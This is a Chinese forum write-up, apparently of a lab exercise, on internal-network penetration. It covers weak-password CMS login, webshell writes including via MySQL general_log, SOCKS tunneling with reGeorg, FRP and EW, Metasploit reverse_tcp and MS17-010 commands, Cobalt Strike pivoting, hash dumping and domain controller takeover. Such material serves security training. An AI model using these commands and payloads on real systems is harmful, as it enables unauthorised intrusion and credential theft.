历史记录

    清空历史记录
    • 相关的动态
    • 相关的文章
    • 相关的用户
    • 相关的圈子
    • 相关的话题
    注册 登录
    记一次内网渗透
    vghost 发表于 北京 渗透测试 2041浏览 · 2024-04-18 10:27

    环境搭建:

    排错:

    在搭建过程中发现报错,删除这部分内容就成功解决。

    信息收集

    端口扫描

    使用namp -sn 探测存活IP

    接着去查看服务

    web服务

    然后发现80端口。访问
    发现有管理员接口,并泄露了默认用户名和密码。

    弱口令登录

    使用弱口令登录,成功进入后台。


    在编辑模板的地方,我们新增一个shell.php

    文件写入漏洞


    文件写在了:/yxcms/protected/apps/default/view/default/

    成功获取shell。

    内网渗透

    进入内网,收集IP信息。

    IP信息

    内网扫描

    上传fscan扫描:

    发现存在phpMyadmin

    PhpAdmin-getshell

    通过未授权成功写入,然后getshell

    路径:C:\phpstudy_pro\Extensions\MySQL5.7.26\
    写入木马:

    into写入文件:
    使用需看要secure_file_priv的值。
    当value为“null”时,不允许读取任意文件
    当value为“空”时,允许读取任意文件
    value可也已设置为其他路径。
    show variables like "%general%";

    general_log和general_log_file简述:
    mysql打开general_log开关之后,所有对数据库的操作都将记录在general_log_file指定的文件目录中,以原始的状态来显示,如果将general_log开关打开,general_log_file指定一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,可以通过访问general_log_file指定的文件来获取webshell。
    开启日志记录:set global general_log = “ON”;再查询日志状态。
    set global general_log_file=‘C:/phpstudy_pro/www/shell1.php’;

    写入shell1.php

    扫描另一个网段发现存在ms17-010和域机器。

    代理搭建:

    python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
python neoreg.py  -u http://192.168.163.138/www.yxcms6.com/protected/apps/default/view/default/tunnel.php --proxy socks5://10.1.1.1:8888
毒刺
webshell
 windows:start D:/XXX/stinger_server.exe 0.0.0.0
客户端(vps)
./stinger_client -w http://192.168.163.138/www.yxcms6.com/protected/apps/default/view/default/proxy.php -l 127.0.0.1 -p 60000

    使用哥斯拉内置代理。

    搭建FRP

    VPS设置服务端

    [common]
bind_port = 57000
token = 123qwe    
heartbeat_timeout = 90  
max_pool_count = 5

    webshell设置客户端

    [common]
server_addr = 1.1.1.1
server_port = 57000
token = 123qwe
pool_count = 5
protocol = tcp
health_check_type = tcp
health_check_interval_s = 100


[socks_test]
remote_port = 10000  
plugin = socks5
plugin_user = admin
plugin_passwd = password
use_encryption = true
use_compression = true

    使用CS内网渗透

    msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.239.198
set lport 6666
run

    msf搭建代理

    使用哥斯拉的shell转到msf上。

    成功shell。

    Ms17-010

    使用msf去打永恒之蓝。

    代理尝试

    kali:
    /ew_for_linux64 -s rcsocks -l 1080 -e 9999
    目标机器:
    ew_for_Win.exe -s rssocks -d 192.168.163.128 -e 9999

    使用msf进行测试永恒之蓝。

    use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.239.198
set LPORT 4444
set RHOST 192.168.52.141
set SMBUser weizi
set SMBPass HONGRISEC@2019
run

    msf转到cs

    接着使用msf转到cs上。

    cs成功上线。

    成功上线之后,使用cs进行渗透。

    信息收集

    接着使用cs进行信息收集

    发现域内管理员账号。

    然后查看pc信息,

    查看进程。

    发现域为god.org

    尝试定位域控。

    提权

    使用cs的功能进行权限提权

    成功获取管理员权限。

    hash抓取

    接着抓hash

    成功抓到管理员账号、密码。

    接着进行横向传递

    成功获取AD和另一台域内主机

    使用MSF渗透

    获取shell之后,设置socks代理。

    代理搭建

    接着进行信息收集,发现其它主机信息。

    rdp代理

    成功获取另一台域内主机。

    接着继续打永恒之蓝。

    横向

    成功执行命令。

    然后进行横向登录。

    继续进行rdp,登录winserver2012

    获取域控

    成功获取AD权限。

    2 人收藏 1 人喜欢 转载 分享
    2 条评论
    某人
    表情
    可输入 255
      发布投稿
    热门文章
    优秀作者
    目录
    先知社区
    本站/app由 Djingoii 提供技术和产品支持